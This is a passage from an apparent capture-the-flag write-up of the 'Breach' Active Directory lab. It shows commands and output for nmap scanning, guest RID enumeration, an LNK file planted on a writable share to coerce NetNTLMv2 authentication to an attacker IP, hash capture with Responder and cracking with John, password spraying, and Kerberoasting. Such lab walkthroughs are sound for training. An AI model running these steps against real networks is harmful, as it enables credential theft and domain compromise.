rtt min/avg/max/mdev = 249.887/255.255/260.624/5.368 ms</code></pre></div><p>Continue with NMAP Scanning</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 10.129.11.224 -oA nmap/nmap                                   
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for BREACHDC (10.129.11.224)
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49677/tcp open  unknown
50023/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p53,80,88,135,139,389,445,464,593,636,1433,3268-3269,3389,5985,9389 -sC -sV 10.129.11.224 -oA nmap/nmap-ports
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 10:03 -0400
Nmap scan report for BREACHDC (10.129.11.224)
Host is up (0.25s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-01 14:03:26Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.11.224:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-04-01T14:04:26+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-04-01T13:55:44
|_Not valid after:  2056-04-01T13:55:44
| ms-sql-ntlm-info: 
|   10.129.11.224:1433: 
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-04-01T14:04:26+00:00; +6s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-04-01T14:03:47+00:00
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2026-03-31T13:52:57
|_Not valid after:  2026-09-30T13:52:57
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 
|_  start_date: N/A
|_clock-skew: mean: 5s, deviation: 0s, median: 5s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><p>From here we&#8217;ve exposed to many port options, including HTTP and MSSQL which is would be nice to check.</p><p>And we even got hostsname:</p><ul><li><p>BREACHDC.breach.vl</p></li><li><p>BREACHDC </p></li><li><p>breach.vl</p></li></ul><p>Make that local and continue.</p><p>PS: There&#8217;s nothing here so I skipped the Web and abuse the Active Directory misconfigured shares on SMB.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!D393!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!D393!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!D393!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!D393!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!D393!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!D393!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:167593,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192855357?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!D393!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!D393!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!D393!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!D393!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd41f5619-4718-434f-9b06-e50cfc1a0848_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ol start="2"><li><p><em>SMB Shares Enumeration and Attack</em></p></li></ol><p>From the SMB I discover that the &#8220;Guest&#8220; account are abuse-able, meaning I can reach so RID and get all local user with it, and Guest account have non-password SMB &#8220;WRITE&#8220; access so that&#8217;s dope, leaving options of poisoning and get NTLMv2 hash.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!-kWL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!-kWL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png 424w, https://substackcdn.com/image/fetch/$s_!-kWL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png 848w, https://substackcdn.com/image/fetch/$s_!-kWL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png 1272w, https://substackcdn.com/image/fetch/$s_!-kWL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!-kWL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png" width="1430" height="781" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:781,&quot;width&quot;:1430,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:338480,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192855357?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fda0e1b8b-81b8-4a12-a42b-4ff4a16b4ecc_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!-kWL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png 424w, https://substackcdn.com/image/fetch/$s_!-kWL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png 848w, https://substackcdn.com/image/fetch/$s_!-kWL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png 1272w, https://substackcdn.com/image/fetch/$s_!-kWL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f9cfd27-420b-4eb2-b513-3c68187661c0_1430x781.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Summary:</p><ul><li><p>RID leading to User enumeration</p></li><li><p>Non-password protected WRITE access</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb breachdc.breach.vl -u guest -p '' --rid-brute 1200 | awk -F'\\\\' '/SidTypeUser/ { split($2,a," "); print a[1] }' | sort -u
Administrator
BREACHDC$
Christine.Bruce
Claire.Pope
Diana.Pope
George.Williams
Guest
Hilary.Reed
Hugh.Watts
Jasmine.Price
Jasmine.Slater
Julia.Wong
krbtgt
Lawrence.Kaur
svc_mssql</code></pre></div><p>Sadly none of this User are roastable with AS-REP.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb breachdc.breach.vl -u guest -p '' --users --shares                                                                         
SMB         10.129.11.224   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.11.224   445    BREACHDC         [+] breach.vl\guest: 
SMB         10.129.11.224   445    BREACHDC         [*] Enumerated shares
SMB         10.129.11.224   445    BREACHDC         Share           Permissions     Remark
SMB         10.129.11.224   445    BREACHDC         -----           -----------     ------
SMB         10.129.11.224   445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.129.11.224   445    BREACHDC         C$                              Default share
SMB         10.129.11.224   445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.129.11.224   445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.129.11.224   445    BREACHDC         share           READ,WRITE      
SMB         10.129.11.224   445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.129.11.224   445    BREACHDC         Users           READ</code></pre></div><p>Further-more I deeply enumerate the SMB shares that we have WRITE Access on it.</p><p>And discover many users:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">. . .[SNIP]. . .
smb: \software\&gt; cd ..
smb: \&gt; cd transfer\
smb: \transfer\&gt; ls
  .                                   D        0  Mon Sep  8 06:13:44 2025
  ..                                  D        0  Wed Apr  1 10:00:05 2026
  claire.pope                         D        0  Thu Feb 17 06:21:35 2022
  diana.pope                          D        0  Thu Feb 17 06:21:19 2022
  julia.wong                          D        0  Wed Apr 16 20:38:12 2025

                7863807 blocks of size 4096. 1550174 blocks available
smb: \transfer\&gt; cd julia.wong\</code></pre></div><p>This is would be the place I poison and abuse the WRITE Access with Only NetExec and Responder.</p><ol start="3"><li><p><em>Gain NetNTLMv2 Hashes</em></p></li></ol><ul><li><p>netexec smb breachdc.breach.vl -u guest -p &#8216;&#8216; -M slinky -o SERVER=10.10.15.169 NAME=&#8221;transfer\test&#8221; SHARES=&#8221;share&#8221;</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb breachdc.breach.vl -u guest -p '' -M slinky -o SERVER=10.10.15.169 NAME="transfer\test" SHARES="share"
SMB         10.129.11.224   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.11.224   445    BREACHDC         [+] breach.vl\guest: 
SMB         10.129.11.224   445    BREACHDC         [*] Enumerated shares
SMB         10.129.11.224   445    BREACHDC         Share           Permissions     Remark
SMB         10.129.11.224   445    BREACHDC         -----           -----------     ------
SMB         10.129.11.224   445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.129.11.224   445    BREACHDC         C$                              Default share
SMB         10.129.11.224   445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.129.11.224   445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.129.11.224   445    BREACHDC         share           READ,WRITE      
SMB         10.129.11.224   445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.129.11.224   445    BREACHDC         Users           READ            
SLINKY      10.129.11.224   445    BREACHDC         [+] Found writable share: share
SLINKY      10.129.11.224   445    BREACHDC         [+] Created LNK file on the share share</code></pre></div><p>Let&#8217;s look at Responder:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo responder -Q -I tun0 -wd
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[*] Tips jar:
    USDT -&gt; 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
    BTC  -&gt; bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
    LLMNR                      [ON]
. . .[SNIP]. . .

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, &lt;lgaffie@secorizon.com&gt;

[+] Listening for events...                                                                                                                                                                        

[+] Responder is in quiet mode. No NBT-NS, LLMNR, MDNS messages will print to screen.
[SMB] NTLMv2-SSP Client   : 10.129.11.224
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:57938d5367ce78b4:150F23F1C3EA113DAF2B1C7C47E943E0:01010000000000000021D4D8BEC1DC017F31EE16A824567F0000000002000800340057005400320001001E00570049004E002D004900490051003000350038004E00420033003500500004003400570049004E002D004900490051003000350038004E0042003300350050002E0034005700540032002E004C004F00430041004C000300140034005700540032002E004C004F00430041004C000500140034005700540032002E004C004F00430041004C00070008000021D4D8BEC1DC01060004000200000008003000300000000000000001000000002000009BFCDEA7BC40FA6A22BFFEDBC3285B570D336AECD2AEEE001B4651691FD7DEFE0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100360039000000000000000000                                                   
[*] Skipping previously captured hash for BREACH\Julia.Wong
[*] Skipping previously captured hash for BREACH\Julia.Wong
[*] Skipping previously captured hash for BREACH\Julia.Wong
[*] Skipping previously captured hash for BREACH\Julia.Wong</code></pre></div><p>That&#8217;s dope, we got the NTLMv2 hash.</p><p>Let&#8217;s crack it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ john netntv2.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Computer1        (Julia.Wong)     
1g 0:00:00:00 DONE (2026-04-01 10:07) 12.50g/s 1510Kp/s 1510Kc/s 1510KC/s bratz1234..042602
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.</code></pre></div><p>And we found a pair of:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: Julia.Wong
passwd: Computer1</code></pre></div><p>With no-password reuse case.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap breachdc.breach.vl -u users.txt -p Computer1 --continue-on-success                 
LDAP        10.129.11.224   389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Administrator:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\BREACHDC$:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Christine.Bruce:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Claire.Pope:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Diana.Pope:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\George.Williams:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Guest:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Hilary.Reed:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Hugh.Watts:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Jasmine.Price:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Jasmine.Slater:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [+] breach.vl\Julia.Wong:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\krbtgt:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\Lawrence.Kaur:Computer1 
LDAP        10.129.11.224   389    BREACHDC         [-] breach.vl\svc_mssql:Computer1</code></pre></div><ol start="4"><li><p><em>Active Directory Kerberoasting</em></p></li></ol><p>Let&#8217;s use Julia.Wong credential to find potential Kerberos Attack.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap breachdc.breach.vl -u Julia.Wong -p Computer1 -k --kerberoasting out.hash
LDAP        breachdc.breach.vl 389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        breachdc.breach.vl 389    BREACHDC         [+] breach.vl\Julia.Wong:Computer1 
LDAP        breachdc.breach.vl 389    BREACHDC         [*] Skipping disabled account: krbtgt
LDAP        breachdc.breach.vl 389    BREACHDC         [*] Total of records returned 1
LDAP        breachdc.breach.vl 389    BREACHDC         [*] sAMAccountName: svc_mssql, memberOf: [], pwdLastSet: 2022-02-17 05:43:08.106169, lastLogon: 2026-04-01 09:55:41.083799
LDAP        breachdc.breach.vl 389    BREACHDC         $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl\svc_mssql*$9a35ce31a30069e869ce4cc95a25b7f9$48f1073ae7bea84d60ee0dfb5c48c6f05fd2c818f6b2aa57d12f927bd291527b79f1a93cf330033f169e068370b41da23023bc84c61234c935fbf567446a18cb00bcb3eb9e423cbb070aa5888cbf306a18bff5bab0dbd33dbba39379f2e77b3380bf0ea656d6103e4d918c9438049eb264de33620a31c3407551548de5d846320070a3fd8d48cdb3af0ba6d0cea9d957b237a07ec7322418af1ea96446ca89b258e876b4762c2bcac1f87f5676aa0623c03fc6e43e36d1fc14f22c6da157be16c29c7e1c089c6584db8e7ebad29ad7c3ddd859f82a55faefc796603bac6fc7e54f69427a78b91f742b907d4c80fbcb87ee93a5037d66d514c12fe70618b5a12c988efe41fc30e03912f6bd8e624b19bbde53e56ca20fa55877052cc73161d6ea5b821c01257209529f40bfe96d2944b6b71803bc66f6662b24db8c8a64b03b5a924e747b7ab2742150e03664d3e3273f0495ad48d2fdff1f9e110e79966f0e9e9e172aee19c860d688aec1823f7325500c1a2058d9eddb342a0e2f57be1c08ec3e7ae42f1c4a54a46772211cbb051070fd5f2eb208916f08ef2538ec59fea695d61104040aef5a5df18b31fcff78f6a165a150f6206ee4776c72d95938937b2eb6ddd5b1fabc27aceabb5a05c35e42e08609b6e0b984f7d61fedc520741612b3c1b2e706300167d34c77eb7c9d382798b11295a390309694930731b4b81c2c4a55cabb80f3afddbe6242defe7a4e7024c9a6ee4ddaadfed02bc28f818b4ac9f53791b59a3e27515341ec12f7d22d7f0acc1d7266005dcf3c55bbc426a0d0f54c9f81baf366a49be2d63d945068608c324aef2014f2623c4e6943fcb8657f9cb604334dc0328acc6ee181c60acd103112b8461cede0b29c3e83c7fe013e10cdfc8d63e66e5fc9313d0f740fb5b3c5788757c3c32c71ec49072401855328642a66392f64d51731618d63eba318c0aaec109ce5edaf930038a6433f12b771101daee7eac80418686df441af88255ce920562d3956fb07403435453fa6176a90c500a94b621298cf9c295f27cd2e14d2840dea3d88698ec37ec2f04f71e24427c67a4207885b2929342b167425ae7be163b784f06b7075e0951913c3a0e4b31008825c254db90cd7be723658ce1c5086fe48adeb4bd921ef229a4083c165bc0c6673c44f4621331ef2fbbc3458258e9a58a7cae64c904e212f7feff46d477063d16043ce3127d9abb77a874cebefb32503f10be4fe4f3006757560a9802f78a3ec3b7cf8f095d76ddf67c337f409c7ae69c9dcf563270ba2f3741a310ce2ace5f939b211d9277529685402c1c2b6e7fe28b93644ce1891ae94a1b8e30dce95a3b0f0f982798cce72f0cb7de38d641a